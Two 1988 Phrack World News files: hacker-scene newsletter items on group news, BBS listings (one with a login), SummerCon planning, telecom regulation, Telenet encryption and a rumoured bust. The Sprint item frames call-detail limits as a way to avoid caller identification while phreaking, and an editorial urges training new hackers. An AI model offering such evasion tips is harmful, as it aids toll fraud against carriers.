 This file has been brought to you by Prime Suspect and Tribunal of Knowledge
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                    Volume Two, Issue 18, Phile #10 of 11

             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
             PWN                                             PWN
             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
             PWN                Issue XVIII/1                PWN
             PWN                                             PWN
             PWN       Created, Compiled, and Written        PWN
             PWN                 By: Epsilon                 PWN
             PWN                                             PWN
             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Intro
=====

Welcome to yet another issue of Phrack World News.  We have once again
returned to try and bring you an entertaining, and informative newsletter
dedicated to the spread of information and knowledge throughout the H/P
community.
______________________________________________________________________________

TOK Re-Formed
=============

A group called Tribunal Of Knowledge, which has undergone previous
re-formations has once again re-formed.  The person who is currently "in
charge" of the group says that he had permission from High Evolutionary, the
group's founder, to re-form the organization.  Although the group hasn't
publicly announced their existence or written any files, we should be hearing
from them in the near future.

The Current Members of TOK Include -

         Control C
         Prime Suspect
         Jack Death
         The UrVile
         The Prophet
         Psychic Warlord

             Information Provided By Control C, and Prime Suspect.
______________________________________________________________________________

Phrack Inc. Support Boards
==========================

Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts
on the more popular boards around.  These sponsor accounts are set up, so that
the users may get in touch with the Phrack Magazine staff if they would like
to contribute an article, or any other information to our publication.  Please
take note of the boards on which Phrack Inc. accounts are set up.  Thank you.

The Current List of Phrack Inc. Sponsor Boards Includes -

         P-80 Systems        - 304/744-2253
         OSUNY               - 914/725-4060
         The Central Office  - 914/234-3260
         Digital Logic's DS  - 305/395-6906
         The Forgotten Realm - 618/943-2399 *

         * - Phrack Headquarters
______________________________________________________________________________

SummerCon '88 Preliminary Planning
==================================

Planning for SummerCon '88 is underway.  So far, we have decided on four
tentative locations:  New York City, Saint Louis, Atlanta, or Florida.  Since
this is only tentative, no dates have been set or reservations made for a
conference.

If you have any comments, suggestions, etc, please let us know.  If you are
planning to attend SummerCon '88, please let us know as well.  Thank you.

                 Information Provided By The Forgotten Realm.
______________________________________________________________________________

LOD/H Technical Journal
=======================

Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
so he has not had the time, nor the initiative to release the next issue of
the LOD/H Technical Journal.  On this note, he has tentatively turned the
Journal over to Phantom Phreaker, who will probably be taking all
contributions for the Journal.  No additional information is available.

           Information Provided By The UrVile and Phantom Phreaker.
______________________________________________________________________________

Congress To Restrict 976/900 Dial-A-Porn Services
=================================================

Congress is considering proposals to restrict dial-up services in an effort to
make it difficult for minors to access sexually explicit messages.  A
House-Senate committee is currently negotiating the "dial-a-porn" proposal.
Lawmakers disagree whether or not the proposal is constitutional and are
debating the issue of requiring phone companies to offer a service that would
allow parents, free of charge, to block the 976/900 services.  Other proposals
would require customers to pay in advance or use credit cards to access the
976/900 services.

Some companies are currently offering free services that restrict minors from
accessing sexually explicit messages.  AT&T and Department of Justice
officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone
companies.  The FCC recently brought charges against one of AT&T's largest 900
Service customers, and AT&T provided the confidential information necessary in
the prosecution.  AT&T also agreed to suspend or disconnect services of
companies violating the commission ban by transmitting obscene or indecent
messages to minors.
______________________________________________________________________________

Some Hope Left For Victims Of FGD
=================================

US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may
pose no threat to individuals under switches that do not yet offer equal
access service to alternate long distance carriers.  Due to the way Feature
Group D routes its information, the ten-digit originating number of the caller
is not provided when the call is placed from a non-equal access area.  The
following was taken from an explanation of US Sprint's 800 INWATS Service.

        *************************************************************

                                 CALL DETAIL

        *************************************************************

With US Sprint 800 Service, a customer will receive call detail information
for every call on every invoice.  The call detail for each call includes:

         o  Date of call
         o  Time of call
         o  The originating city and state
         o  The ten-digit number of the caller if the call originates in an
            equal access area or the NPA of the caller if the non-equal access
            area.
         o  Band into which the call falls
         o  Duration of the call in minutes
         o  Cost of the call

This came directly from US Sprint.  Do as you choose, but don't depend on
this.

                      Information Provided by US Sprint.
______________________________________________________________________________

Telenet Bolsters Network With Encryption
========================================

Telenet Communications Corporation strengthened its public data network
recently with the introduction of data encryption capability.

The X.25 Encryption Service provides a type of data security previously
unavailable on any public data network, according to analysts.  For Telenet,
the purpose of the offering is "to be more competitive; nobody else does
this," according to Belden Menkus, an independent network security consultant
based in Middleville, NJ.

The service is aimed at users transmitting proprietary information between
host computers, such as insurance or fund-transfer applications.  It is priced
at $200 per month per host computer connection.  Both the confidentiality and
integrity of the data can be protected via encryption.

The scheme provides end-to-end data encryption, an alternative method whereby
data is decrypted and recrypted at each node in the network.  "This is a
recognition that end-to-end encryption is really preferable to link
encryption," Menkus said.

The service is available over both dial-up and leased lines, and it supports
both synchronous and asynchronous traffic at speeds up to 9.6K BPS.

Telenet has approved one particular data encryption device for use with the
service, The Cipher X 5000, from Technical Communications Corporation (TCC), a
Concord, Massachusetts based vendor.  TCC "has been around the data encryption
business for quite a while," Menkus said.

The Cipher X implements the National Bureau of Standards' Data Encryption
Standard (DES).  DES is an algorithm manipulated by a secret 56 bit key.
Computers protected with the device can only be accessed by users with a
matching key.

The data encryptor is installed at user sites between the host computer and
the PAD (Packet Assembler/Disassembler).

Installation of the TCC device does not affect the user's ability to send
non-encrypted data, according to Telenet.  By maintaining a table of network
addresses that require encryption, the device decides whether or not to
encrypt each transmission.

                    Information Provided by Network World.
______________________________________________________________________________
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                    Volume Two, Issue 18, Phile #11 of 11

             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
             PWN                                             PWN
             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
             PWN                Issue XVIII/2                PWN
             PWN                                             PWN
             PWN          Created By Knight Lightning        PWN
             PWN                                             PWN
             PWN             Compiled and Written            PWN
             PWN                  by Epsilon                 PWN
             PWN                                             PWN
             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


Intro
=====

It seems that there is yet some things to be covered.  In addendum, we will be
featuring, as a part of PWN, a special section where up-and-coming H/P
Bulletin Boards can be advertised.  This will let everyone know where the
board scene stands.  If you have a board that you feel has potential, but
doesn't have good users, let us know.  Thanks.
______________________________________________________________________________

Doctor Cypher Busted?
=====================

Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is
believed to have had his modem confiscated by "Telephone Company Security,"
and by his local Sheriff.  No charges have been filed as of this date.  He
says he will be using a friend's equipment to stay in touch with the world.

                  Information Provided by Hatchet Molly
______________________________________________________________________________

Give These Boards A Call
========================

These systems have potential, but need good users, so give them a call, and
help the world out.

         The Autobahn -                The Outlet Private -

         703/629-4422                  313/261-6141
         Primary - 'central'           newuser/kenwood
         Sysop - The Highwayman        Sysop - Ax Murderer
         Hack/Phreak                   Private Hack/Phreak

         Dallas Hack Shack -           The Forgotten Realm -

         214/422-4307                  618/943-2399
         Apply For Access              Apply For Access
         Sysop - David Lightman        Sysop - Crimson Death
         Private Hack/Phreak           Private H/P & Phrack Headquarters
______________________________________________________________________________

AllNet Hacking Is Getting Expensive
===================================

For those of you who hack AllNet Long Distance Service, watch out.  AllNet
Communications Corp. has announced that they will be charging $500.00 PER
ATTEMPT to hack their service.  That's not PER VALID CODE, that's PER ATTEMPT.
Sources say that The Fugitive (619) received a $200,000.00 phone bill from
AllNet.

This may set examples for other long distance communication carriers in the
future, so be careful what you do.
______________________________________________________________________________

Editorial - What Is The Best Way To Educate New Hackers?
========================================================

Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a
board dedicated to the education of new hackers.  Although PK2600 is still up
(806/799-0016, educate) many of the old "teachers" never call.  The board has
fallen mainly to new hackers who are looking for teachers.  This may pose a
problem.  If boards aren't the way to educate these people (I think they are
the best way, in fact), then what is?  Certainly not giant Alliance
conferences as in the past, due to recent "black-listing" of many "conferees"
who participated heavily in Alliance Teleconferencing in the past.

I think it might be successful if someone was able to set up another board
dedicated to teaching new hackers.  A board which is not private, but does
voice validate the users as they login.  Please leave some feedback as to what
you think of this idea, or if you are willing to set this type of system up.
Thanks.
______________________________________________________________________________

US Sprint Employee Scam
=======================

The US Sprint Security Department is currently warning employees of a scam
which could be affecting them.  An unidentified man has been calling various
employees throughout the US Sprint system and telling them that if they give
him their FON Card numbers, they will receive an additional US Sprint employee
long-distance credit.  The Security Department says, "this is a 100 percent
scam."  "If you're called to take part in this operation, please call the
Security Department at (816)822-6217."

                      Information Provided By US Sprint
______________________________________________________________________________



--------------------------------------------------------------------------------